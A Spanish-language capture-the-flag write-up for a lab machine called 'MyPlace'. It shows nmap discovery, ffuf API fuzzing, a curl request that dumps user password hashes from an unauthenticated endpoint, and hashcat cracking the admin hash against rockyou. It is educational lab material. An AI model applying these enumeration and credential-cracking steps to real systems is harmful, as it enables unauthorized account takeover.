MYPLACE
Descubrimiento
Sección titulada «Descubrimiento»┌──(kali㉿DESKTOP-3V92LT1)-[~]└─$ nmap 172.20.0.0/24 -p 3000 --openStarting Nmap 7.95 ( https://nmap.org ) at 2026-02-27 16:43 CETNmap scan report for 172.20.0.116Host is up (0.0015s latency).
PORT STATE SERVICE3000/tcp open pppMAC Address: 08:00:27:51:24:C0 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 256 IP addresses (41 hosts up) scanned in 27.43 secondsPOST /api/session/authenticate HTTP/1.1Host: 172.20.0.116:3000Content-Length: 39Accept-Language: es-ES,es;q=0.9Accept: application/json, text/plain, */*Content-Type: application/json;charset=UTF-8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36Origin: http://172.20.0.116:3000Referer: http://172.20.0.116:3000/loginAccept-Encoding: gzip, deflate, brConnection: keep-alive
{"username":"admin","password":"admin"}Fuzzing
Sección titulada «Fuzzing»┌──(kali㉿DESKTOP-3V92LT1)-[~]└─$ ffuf -u http://172.20.0.116:3000/api/FUZZ -w /mnt/d/Otros/wordlists/directory-list-2.3-big.txt -fc 404
/'___\ /'___\ /.___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/
v2.1.0-dev________________________________________________
:: Method : GET :: URL : http://172.20.0.116:3000/api/FUZZ :: Wordlist : FUZZ: /mnt/d/Otros/wordlists/directory-list-2.3-big.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response status: 404________________________________________________
new [Status: 200, Size: 3861, Words: 727, Lines: 91, Duration: 29ms]default [Status: 200, Size: 3861, Words: 727, Lines: 91, Duration: 32ms]search [Status: 200, Size: 3861, Words: 727, Lines: 91, Duration: 38ms]privacy [Status: 200, Size: 3861, Words: 727, Lines: 91, Duration: 39ms]faq [Status: 200, Size: 3861, Words: 727, Lines: 91, Duration: 40ms]blog [Status: 200, Size: 3861, Words: 727, Lines: 91, Duration: 41ms]news [Status: 200, Size: 3861, Words: 727, Lines: 91, Duration: 47ms]spacer [Status: 200, Size: 3861, Words: 727, Lines: 91, Duration: 53ms]10 [Status: 200, Size: 3861, Words: 727, Lines: 91, Duration: 54ms]rss [Status: 200, Size: 3861, Words: 727, Lines: 91, Duration: 57ms]images [Status: 200, Size: 3861, Words: 727, Lines: 91, Duration: 60ms]
-fl 91
┌──(kali㉿DESKTOP-3V92LT1)-[~]└─$ ffuf -u http://172.20.0.116:3000/api/FUZZ -w /mnt/d/Otros/wordlists/directory-list-2.3-big.txt -fc 404 -fl 91
/'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/
v2.1.0-dev________________________________________________
:: Method : GET :: URL : http://172.20.0.116:3000/api/FUZZ :: Wordlist : FUZZ: /mnt/d/Otros/wordlists/directory-list-2.3-big.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response status: 404 :: Filter : Response lines: 91________________________________________________
users [Status: 200, Size: 611, Words: 1, Lines: 1, Duration: 84ms]Users [Status: 200, Size: 611, Words: 1, Lines: 1, Duration: 65ms]Explotación
Sección titulada «Explotación»Abuso de API
Sección titulada «Abuso de API»┌──(kali㉿DESKTOP-3V92LT1)-[~]└─$ curl http://172.20.0.116:3000/api/users[{"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT","password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true},{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},{"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}][ { "_id": "59a7365b98aa325cc03ee51c", "username": "myP14ceAdm1nAcc0uNT", "password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af", "is_admin": true }, { "_id": "59a7368398aa325cc03ee51d", "username": "tom", "password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240", "is_admin": false }, { "_id": "59a7368e98aa325cc03ee51e", "username": "mark", "password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73", "is_admin": false }, { "_id": "59aa9781cced6f1d1490fce9", "username": "rastating", "password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0", "is_admin": false }]Credenciales
Sección titulada «Credenciales»┌──(kali㉿DESKTOP-3V92LT1)-[~]└─$ hashid dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0afAnalyzing 'dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af'[+] Snefru-256[+] SHA-256[+] RIPEMD-256[+] Haval-256[+] GOST R 34.11-94[+] GOST CryptoPro S-Box[+] SHA3-256[+] Skein-256[+] Skein-512(256)
┌──(kali㉿DESKTOP-3V92LT1)-[~]└─$ hashcat -m 1400 -a 0 dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af /mnt/d/Otros/wordlists/rockyou.txthashcat (v7.1.2) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]====================================================================================================================================================* Device #01: cpu-skylake-avx512-AMD Ryzen AI 9 HX 370 w/ Radeon 890M, 4858/9716 MB (2048 MB allocatable), 24MCU
Minimum password length supported by kernel: 0Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique saltsBitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotatesRules: 1
Optimizers applied:* Zero-Byte* Early-Skip* Not-Salted* Not-Iterated* Single-Hash* Single-Salt* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.Pure kernels can crack longer passwords, but drastically reduce performance.If you want to switch to optimized kernels, append -O to your commandline.See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory allocated for this attack: 518 MB (10060 MB free)
Dictionary cache hit:* Filename..: /mnt/d/Otros/wordlists/rockyou.txt* Passwords.: 14344385* Bytes.....: 139921511* Keyspace..: 14344385
dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af:manchester
Session..........: hashcatStatus...........: CrackedHash.Mode........: 1400 (SHA2-256)Hash.Target......: dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07...34d0afTime.Started.....: Fri Feb 27 16:56:26 2026 (0 secs)Time.Estimated...: Fri Feb 27 16:56:26 2026 (0 secs)Kernel.Feature...: Pure Kernel (password length 0-256 bytes)Guess.Base.......: File (/mnt/d/Otros/wordlists/rockyou.txt)Guess.Queue......: 1/1 (100.00%)Speed.#01........: 4236.3 kH/s (0.54ms) @ Accel:1024 Loops:1 Thr:1 Vec:16Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)Progress.........: 24576/14344385 (0.17%)Rejected.........: 0/24576 (0.00%)Restore.Point....: 0/14344385 (0.00%)Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1Candidate.Engine.: Device GeneratorCandidates.#01...: 123456 -> 280690Hardware.Mon.#01.: Util: 5%
Started: Fri Feb 27 16:56:15 2026Stopped: Fri Feb 27 16:56:27 2026
manchester
! [inside it] (images/myplace-login.png)